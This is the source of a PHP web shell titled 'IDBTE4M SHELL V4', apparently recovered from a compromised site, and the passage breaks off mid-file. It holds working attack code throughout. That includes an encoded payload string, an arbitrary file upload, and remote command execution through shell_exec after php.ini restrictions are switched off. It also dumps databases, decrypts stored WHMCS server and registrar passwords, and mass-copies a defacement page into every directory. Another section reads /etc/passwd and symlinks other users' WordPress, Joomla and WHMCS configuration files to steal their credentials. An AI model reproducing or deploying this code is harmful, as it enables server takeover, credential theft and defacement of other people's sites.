516$jumper="fVJtb5swEP4rF4Rko7Ka7WMCpFLVfp20fWwrarA9PAFGtlmXVfvvuwtN1mjShEDmebl77kB3vYOkjLIdNHSDDKF6TLpRte7nY1KX0eOtoHNDmOWE1CdEkx3wNIxQgZ1s801HzoI0uhmd0iyDqoIigz2sEuaMYVtQVvPkznvnt/D1JEb681SKqGp8eHpQjLpU9sc5y3d5kJREIFgn2Q6Cjk20o24GO9rIC4Ru0hnFLwrrGTfriTOhYydWkOXMMxRZA3zzJszglRIBTx4+PMExFmzh1i1qeo7wRUsF7yr8m5By/IZ0XlpsKb2XB45IugTtwwXSuclcABbfih289HbQfGO0M/yUKXvFlUVPQ+BOwxlfo6Ozho9FQarZURfU4oGTJ2dbdgowyZEWG5YWiZUtcrKQQFn/iz6K6N2oBbs+O66ZwGkG2zV9HAfB1qb8b8UNuhhlJNyGxuOSaBf8WJOI45DNvIR+tYX87MbW71nslK82WiNdqb26orNxWLfr4a0CyLAOheU1/ans4d4tk4LNE5QSeq9NlewP1cU4l6Mk9X9IUQpZl62vGTXf138A";
517?>
518<html><head><link rel="SHORTCUT ICON" href="http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png"><title>-=[ IDBTE4M SHELL V4 ]=-</title>
519<script type="text/javascript">
520function tukar(lama,baru){
521 document.getElementById(lama).style.display = 'none';
522 document.getElementById(baru).style.display = 'block';
523}
524</script>
525<style type="text/css">
526body{
527 background:#000000;;
528}
529a {
530text-decoration:none;
531}
532a:hover{
533border-bottom:1px solid #00ff00;
534}
535*{
536 font-size:11px;
537 font-family:Tahoma,Verdana,Arial;
538 color:#00ff00;
539}
540#menu{
541 background:#111111;
542 margin:8px 2px 4px 2px;
543}
544#menu a{
545 padding:4px 18px;
546 margin:0;
547 background:#222222;
548 text-decoration:none;
549 letter-spacing:2px;
550 -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
551}
552#menu a:hover{
553 background:#191919;
554 border-bottom:1px solid #333333;
555 border-top:1px solid #333333;
556}
557.tabnet{
558 margin:15px auto 0 auto;
559 border: 1px solid #333333;
560}
561.main {
562 width:100%;
563}
564.gaya {
565 color: #00ff00;
566}
567.inputz{
568 background:#111111;
569 border:0;
570 padding:2px;
571 border-bottom:1px solid #222222;
572 border-top:1px solid #222222;
573}
574.inputzbut{
575 background:#111111;
576 color:#00ff00;
577 margin:0 4px;
578 border:1px solid #444444;
579
580}
581.inputz:hover, .inputzbut:hover{
582 border-bottom:1px solid #00ff00;
583 border-top:1px solid #00ff00;
584}
585.output {
586 margin:auto;
587 border:1px solid #00ff00;
588 width:100%;
589 height:400px;
590 background:#000000;
591 padding:0 2px;
592}
593.cmdbox{
594 width:100%;
595}
596.head_info{
597 padding: 0 4px;
598}
599.jaya{ font-family: ;}
600
601.b374k{
602 font-size:30px;
603 padding:0;
604 color:#444444;
605}
606.b374k_tbl{
607 text-align:center;
608 margin:0 4px 0 0;
609 padding:0 4px 0 0;
610 border-right:1px solid #333333;
611}
612.phpinfo table{
613 width:100%;
614 padding:0 0 0 0;
615}
616.phpinfo td{
617 background:#111111;
618 color:#cccccc;
619padding:6px 8px;;
620}
621.phpinfo th, th{
622 background:#191919;
623 border-bottom:1px solid #333333;
624font-weight:normal;
625}
626.phpinfo h2, .phpinfo h2 a{
627 text-align:center;
628 font-size:16px;
629 padding:0;
630 margin:30px 0 0 0;
631 background:#222222;
632 padding:4px 0;
633}
634.explore{
635width:100%;
636}
637.explore a {
638text-decoration:none;
639}
640.explore td{
641border-bottom:1px solid #333333;
642padding:0 8px;
643line-height:24px;
644}
645.explore th{
646padding:3px 8px;
647font-weight:normal;
648}
649.explore th:hover , .phpinfo th:hover{
650border-bottom:1px solid #00ff00;
651}
652.explore tr:hover{
653background:#111111;
654}
655.viewfile{
656background:#EDECEB;
657color:#000000;
658margin:4px 2px;
659padding:8px;
660}
661.sembunyi{
662display:none;
663padding:0;margin:0;
664}
665
666</style>
667</head>
668<body onLoad="document.getElementById('cmd').focus();">
669<div class="main">
670<!-- head info start here -->
671<div class="head_info">
672<table ><tr>
673<td><table class="b374k_tbl"><tr><td><a href="?<?php echo "y=".$pwd; ?>&x=about"><span class="b374k"><img src="http://zonehmirrors.org/defaced/2016/11/11/alignlifewauwatosa.com/kefiex.yu.tl/files/bnx.png" height="150" width="250" /></span></a></td></tr><br>
674<div id="menu" align="left">
675<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
676<td><!-- onMouseOver="this.focus();" --><nobr><input type="file" name="file" class="inputz" size="50">
677<input name="_upl" type="submit" id="_upl" class="inputz" value="Upload"></form></div></b></td></tr></table></td>
678<td><?php echo $buff; ?></td>
679</td>
680</tr>
681</tr></table>
682</div>
683<div id="menu" align="center">
684
685<font color=red size=2 face="TAHOMA">
686<p align="center" dir="ltr"> <hr><center>
687<font color="red" font size=3 > | <font color="white" font size=3 >
688<a href="?" style="text-decoration: none">
689Home </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
690<a href="?idb=sql" style="text-decoration: none">
691SQL </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
692<a href="?idb=cp" style="text-decoration: none">
693Cpanel Cracker </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
694<a href="?idb=jump" style="text-decoration: none">
695Jumping </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
696<a href="?x=maling" style="text-decoration: none">
697Maling Script </a> <font color="white" font size=3 ></font>
698<font color="red" font size=3 > |</font>
699<br><hr><center>
700<font color="red" font size=3 > |</font>
701<a href="?idb=auto" style="text-decoration: none">
702Auto Wget </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
703<a href="?x=php" style="text-decoration: none">
704Shell </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
705<a href="?idb=config" style="text-decoration: none">
706Config Grabber </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
707<a href="?idb=wp2" style="text-decoration: none">
708Config Auto Get </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
709<a href="?idb=zonh" style="text-decoration: none">
710Zon-H </a> <font color="white" font size=3 > <font color="red" font size=3 >|</font>
711<a href="?idb=mass" style="text-decoration: none">
712Mass Deface </a> <font color="white" font size=3 ></font>
713<font color="red" font size=3 >|</font>
714<hr>
715<font color="red" font size=3 >|</font>
716<a href="?idb=brute" style="text-decoration: none">
717Cp Brute </a> <font color="white" font size=3 ></font>
718<font color="red" font size=3 >|</font>
719<a href="?idb=finder" style="text-decoration: none">
720Admin Finder </a> <font color="white" font size=3 ></font>
721<font color="red" font size=3 > |</font>
722<a href="?idb=symlink" style="text-decoration: none">
723Symlink </a> <font color="white" font size=3 ></font>
724<font color="red" font size=3 > |</font>
725<a href="?idb=dump" style="text-decoration: none">
726Db Dump </a> <font color="white" font size=3 ></font>
727<font color="red" font size=3 > |</font>
728<a href="?idb=has" style="text-decoration: none">
729Password Hash </a> <font color="white" font size=3 ></font>
730<font color="red" font size=3 > |</font>
731<a href="?idb=whmcs" style="text-decoration: none">
732Whmcs Decoder </a> <font color="white" font size=3 ></font>
733<font color="red" font size=3 > |</font>
734<a href="?idb=wpp" style="text-decoration: none">
735Wp Mass </a> <font color="white" font size=3 ></font>
736<font color="red" font size=3 > |</font>
737<hr>
738<font color="red" font size=3 >|</font>
739<a href="?idb=jomla" style="text-decoration: none">
740Jomla Mass </a> <font color="white" font size=3 ></font>
741<font color="red" font size=3 > |</font>
742<a href="?idb=wpmas" style="text-decoration: none">
743Wp Mass Manual </a> <font color="white" font size=3 ></font>
744<font color="red" font size=3 > |</font>
745<a href="?idb=sken" style="text-decoration: none">
746Scan All Dir In Server </a> <font color="white" font size=3 ></font>
747<font color="red" font size=3 > |</font>
748<a href="?idb=cgi" style="text-decoration: none">
749Cgi Shell </a> <font color="white" font size=3 ></font>
750<font color="red" font size=3 > |</font>
751<a href="?idb=passwd" style="text-decoration: none">
752Symlink 2 </a> <font color="white" font size=3 ></font>
753</td><hr></center>
754</tr></table></div>
755
756<div id="viewfile" align="left">
757<form method="post">
758<td><nobr><b>CMD</b></nobr></td>
759<td><!-- onMouseOver="this.focus();" --><nobr><input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
760<input class="inputzbut" type="submit" value=" >> " style="width:50px;" />
761</form>
762
763
764<?php
765if( $_POST['_upl'] == "Upload" ) {
766 if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
767 else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
768}
769?>
770<?php
771/*******************************************\
772| CMD linux DTT 2014
773
774\*******************************************/
775$x0f = "fopen";
776$x10 = "fwrite";
777$x11 = "function_exists";
778$x12 = "shell_exec";
779if (isset($_POST['cmd'])) {
780 $x0b = $x0f('php.ini', 'w');
781 $x0c = " disable_functions=none ";
782 $x10($x0b, $x0c);
783 if ($x11('shell_exec')) {
784 $x0d = $_POST['cmd'];
785 $x0e = $x12("$x0d");
786 echo "<div id=result>";
787 echo "<span class=Y><pre>$x0e</pre></span";
788 }
789 echo "</div>";
790}
791?>
792<center>
793<div id="menu" align="center">
794<?php
795if (isset($_GET['idb']) && ($_GET['idb'] == 'dump')) { ?>
796<form action="?idb=dump" method="post">
797<?php
798echo $head.'<p align="center">';
799echo '
800<table width=371 class=tabnet >
801<tr><th colspan="2">Database Dump</th></tr>
802<tr>
803 <td>Server </td>
804 <td><input class="inputz" type=text name=server size=52></td></tr><tr>
805 <td>Username</td>
806 <td><input class="inputz" type=text name=username size=52></td></tr><tr>
807 <td>Password</td>
808 <td><input class="inputz" type=text name=password size=52></td></tr><tr>
809 <td>DataBase Name</td>
810 <td><input class="inputz" type=text name=dbname size=52></td></tr>
811 <tr>
812 <td>DB Type </td>
813 <td><form method=post action="'.$me.'">
814 <select class="inputz" name=method>
815 <option value="gzip">Gzip</option>
816 <option value="sql">Sql</option>
817 </select>
818 <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
819 </form></center></table>';
820if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
821$date = date("Y-m-d");
822$dbserver = $_POST['server'];
823$dbuser = $_POST['username'];
824$dbpass = $_POST['password'];
825$dbname = $_POST['dbname'];
826$file = "Dump-$dbname-$date";
827$method = $_POST['method'];
828if ($method=='sql'){
829$file="Dump-$dbname-$date.sql";
830$fp=fopen($file,"w");
831}else{
832$file="Dump-$dbname-$date.sql.gz";
833$fp = gzopen($file,"w");
834}
835function write($data) {
836global $fp;
837if ($_POST['method']=='ssql'){
838fwrite($fp,$data);
839}else{
840gzwrite($fp, $data);
841}}
842mysql_connect ($dbserver, $dbuser, $dbpass);
843mysql_select_db($dbname);
844$tables = mysql_query ("SHOW TABLES");
845while ($i = mysql_fetch_array($tables)) {
846 $i = $i['Tables_in_'.$dbname];
847 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
848 write($create['Create Table'].";\n\n");
849 $sql = mysql_query ("SELECT * FROM ".$i);
850 if (mysql_num_rows($sql)) {
851 while ($row = mysql_fetch_row($sql)) {
852 foreach ($row as $j => $k) {
853 $row[$j] = "'".mysql_escape_string($k)."'";
854 }
855 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
856 }
857 }
858}
859if ($method=='ssql'){
860fclose ($fp);
861}else{
862gzclose($fp);}
863header("Content-Disposition: attachment; filename=" . $file);
864header("Content-Type: application/download");
865header("Content-Length: " . filesize($file));
866flush();
867
868$fp = fopen($file, "r");
869while (!feof($fp))
870{
871 echo fread($fp, 65536);
872 flush();
873}
874fclose($fp);
875}
876
877}
878elseif(isset($_GET['idb']) && ($_GET['idb'] == 'has'))
879 {
880$submit= $_POST['enter'];
881if (isset($submit)) {
882$pass = $_POST['password']; // password
883$salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
884$hash = md5($pass); // md5 hash #1
885$md4 = hash("md4",$pass);
886$hash_md5 = md5($salt.$pass); // md5 hash with salt #2
887$hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
888$hash1 = sha1($pass); // sha1 hash #4
889$sha256 = hash("sha256",$text);
890$hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
891$hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
892}
893echo '<form action="" method="post"><b><table class=tabnet>';
894echo '<tr><th colspan="2">Password Hash</th></center></tr>';
895echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
896echo '<td><input class="inputz" type="text" name="password" size="40" />';
897echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
898echo '</td></tr><br>';
899echo '<tr><th colspan="2">Hash Result</th></center></tr>';
900echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
901echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
902echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
903echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
904echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
905echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
906echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
907echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
908echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
909}
910elseif(isset($_GET['idb']) && ($_GET['idb'] == 'whmcs'))
911{
912?>
913<form action="?y=<?php echo $pwd; ?>&idb=whmcs" method="post">
914
915<?php
916
917function decrypt ($string,$cc_encryption_hash)
918{
919 $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
920 $hash_key = _hash ($key);
921 $hash_length = strlen ($hash_key);
922 $string = base64_decode ($string);
923 $tmp_iv = substr ($string, 0, $hash_length);
924 $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
925 $iv = $out = '';
926 $c = 0;
927 while ($c < $hash_length)
928 {
929 $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
930 ++$c;
931 }
932 $key = $iv;
933 $c = 0;
934 while ($c < strlen ($string))
935 {
936 if (($c != 0 AND $c % $hash_length == 0))
937 {
938 $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
939 }
940 $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
941 ++$c;
942 }
943 return $out;
944}
945
946function _hash ($string)
947{
948 if (function_exists ('sha1'))
949 {
950 $hash = sha1 ($string);
951 }
952 else
953 {
954 $hash = md5 ($string);
955 }
956 $out = '';
957 $c = 0;
958 while ($c < strlen ($hash))
959 {
960 $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
961 $c += 2;
962 }
963 return $out;
964}
965
966echo "
967<br><center><font size='5' color='#FF0000'><b>--==[ WHMCS Decoder ]==--</b></font></center>
968<center>
969<br>
970
971<FORM action='' method='post'>
972<input type='hidden' name='form_action' value='2'>
973<br>
974<table class=tabnet style=width:320px;padding:0 1px;>
975<tr><th colspan=2>WHMCS Decoder</th></tr>
976<tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
977<tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
978<tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
979<tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
980<tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
981<td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
982</table>
983</FORM>
984</center>
985";
986
987 if($_POST['form_action'] == 2 )
988 {
989 //include($file);
990 $db_host=($_POST['db_host']);
991 $db_username=($_POST['db_username']);
992 $db_password=($_POST['db_password']);
993 $db_name=($_POST['db_name']);
994 $cc_encryption_hash=($_POST['cc_encryption_hash']);
995
996
997
998 $link=mysql_connect($db_host,$db_username,$db_password) ;
999 mysql_select_db($db_name,$link) ;
1000$query = mysql_query("SELECT * FROM tblservers");
1001while($v = mysql_fetch_array($query)) {
1002$ipaddress = $v['ipaddress'];
1003$username = $v['username'];
1004$type = $v['type'];
1005$active = $v['active'];
1006$hostname = $v['hostname'];
1007echo("<center><table border='1'>");
1008$password = decrypt ($v['password'], $cc_encryption_hash);
1009echo("<tr><td>Type</td><td>$type</td></tr>");
1010echo("<tr><td>Active</td><td>$active</td></tr>");
1011echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
1012echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
1013echo("<tr><td>Username</td><td>$username</td></tr>");
1014echo("<tr><td>Password</td><td>$password</td></tr>");
1015
1016echo "</table><br><br></center>";
1017}
1018
1019 $link=mysql_connect($db_host,$db_username,$db_password) ;
1020 mysql_select_db($db_name,$link) ;
1021$query = mysql_query("SELECT * FROM tblregistrars");
1022echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
1023echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1024while($v = mysql_fetch_array($query)) {
1025$registrar = $v['registrar'];
1026$setting = $v['setting'];
1027$value = decrypt ($v['value'], $cc_encryption_hash);
1028if ($value=="") {
1029$value=0;
1030}
1031$password = decrypt ($v['password'], $cc_encryption_hash);
1032echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1033}
1034}
1035}
1036
1037?>
1038<?php
1039if (isset($_GET['idb']) && ($_GET['idb'] == 'mass')) { ?>
1040<form action="?idb=mass" method="post">
1041<?php ?>
1042<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
1043
1044<p class="style3">
1045
1046<span <ul>
1047
1048 <span class="style32">
1049 <span class="style39">
1050<span style="font-weight: 700;" class="style33">
1051 </span></p><br>
1052<span style="font-weight: 700;" class="style33">
1053 <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><br>
1054<br>
1055</center>
1056<div class="style31">
1057<center>
1058<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
1059<div class="style31">
1060[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
1061[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
1062<input type='submit' name='execmassdeface' value='Execute'></div>
1063</form></td></center>
1064<?php
1065echo "<center><textarea rows='10' cols='100'>";
1066$defaceurl = $_POST['massdefaceurl'];
1067$dir = $_POST['massdefacedir'];
1068echo $dir . "
1069";
1070if (is_dir($dir)) {
1071 if ($dh = opendir($dir)) {
1072 while (($file = readdir($dh)) !== false) {
1073 if (filetype($dir . $file) == "dir") {
1074 $newfile = $dir . $file . "/idb.php";
1075 echo $newfile . "
1076";
1077 if (!copy($defaceurl, $newfile)) {
1078 echo "failed to copy $file...
1079";
1080 }
1081 }
1082 }
1083 closedir($dh);
1084 }
1085}
1086echo "</textarea></center>";
1087}
1088?>
1089<?php
1090
1091?>
1092<?php
1093// SHELL IDBTE4M V2
1094// BY ./KEFIEX404 IDBTE4M
1095set_time_limit(0);
1096error_reporting(0);
1097
1098
1099$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
1100$u = explode("/",$pageURL );
1101$pageURL =str_replace($u[count($u)-1],"",$pageURL );
1102
1103$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
1104$u = explode("/",$pageFTP );
1105$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
1106?>
1107
1108<?php
1109if (isset($_GET['idb']) && ($_GET['idb'] == 'config')) {
1110?>
1111<form action="?&idb=config" method="post">
1112<?php
1113@ini_set('max_execution_time',0);
1114@ini_set('display_errors', 0);
1115@ini_set('file_uploads',1);
1116echo '<form method="POST"><textarea cols="30" name="passwd" rows="10">';
1117$uSr=file("/etc/passwd");
1118foreach($uSr as $usrr) {
1119$str=explode(":",$usrr); echo $str[0]."\n"; }
1120?>
1121</textarea><br><input type="hidden" class="input" name="folfig" value="taek" size=40 />
1122<select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
1123<input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
1124<?php
1125@ini_set('html_errors',0);
1126@ini_set('max_execution_time',0);
1127@ini_set('display_errors', 0);
1128@ini_set('file_uploads',1);
1129if ($_POST['conf']) {
1130$folfig = $_POST['folfig']; $type = $_POST['type'];
1131@mkdir($folfig, 0755);
1132@chdir($folfig);
1133$htaccess="
1134Options Indexes FollowSymLinks
1135\nDirectoryIndex .my.cnf
1136\nAddType txt .php
1137\nAddType txt .my.cnf
1138\nAddType txt .accesshash
1139\nAddHandler txt .php
1140\nAddHandler txt .cnf
1141\nAddHandler txt .accesshash
1142";
1143file_put_contents(".htaccess",$htaccess,FILE_APPEND);
1144$passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
1145foreach($passwd as $pwd){ $user=trim($pwd);
1146@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1147@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1148@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1149@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1150@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1151@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1152@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1153@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1154@symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1155@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1156@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1157@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1158@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1159@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1160@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1161@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1162@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1163@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1164@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1165@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1166@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1167@symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1168@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1169@symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
1170@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1171@symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1172@symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1173@symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1174@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1175@symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1176@symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1177@symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1178@symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1179@symlink('/home2/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1180@symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1181@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1182@symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1183@symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1184@symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1185@symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1186@symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1187@symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1188@symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1189@symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1190@symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1191@symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1192@symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1193@symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1194@symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1195@symlink('/home2/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1196@symlink('/home2/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1197@symlink('/home2/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1198@symlink('/home2/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1199@symlink('/home2/'.$user.'/public_html/connect.php',$user.'-8.txt');
1200@symlink('/home2/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1201@symlink('/home2/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1202@symlink('/home2/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1203@symlink('/home2/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1204@symlink('/home2/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1205@symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
1206@symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-vBulletin2.txt');
1207@symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
1208@symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
1209@symlink('/home3/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
1210@symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
1211@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
1212@symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
1213@symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
1214@symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
1215@symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
1216@symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
1217@symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
1218@symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
1219@symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
1220@symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
1221@symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
1222@symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
1223@symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
1224@symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
1225@symlink('/home3/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
1226@symlink('/home3/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
1227@symlink('/home3/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
1228@symlink('/home3/'.$user.'/public_html/include/db.php',$user.'-7.txt');
1229@symlink('/home3/'.$user.'/public_html/connect.php',$user.'-8.txt');
1230@symlink('/home3/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
1231@symlink('/home3/'.$user.'/public_html/include/config.php',$user.'-12.txt');
1232@symlink('/home3/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
1233@symlink('/home3/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
1234@symlink('/home3/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
1235@symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
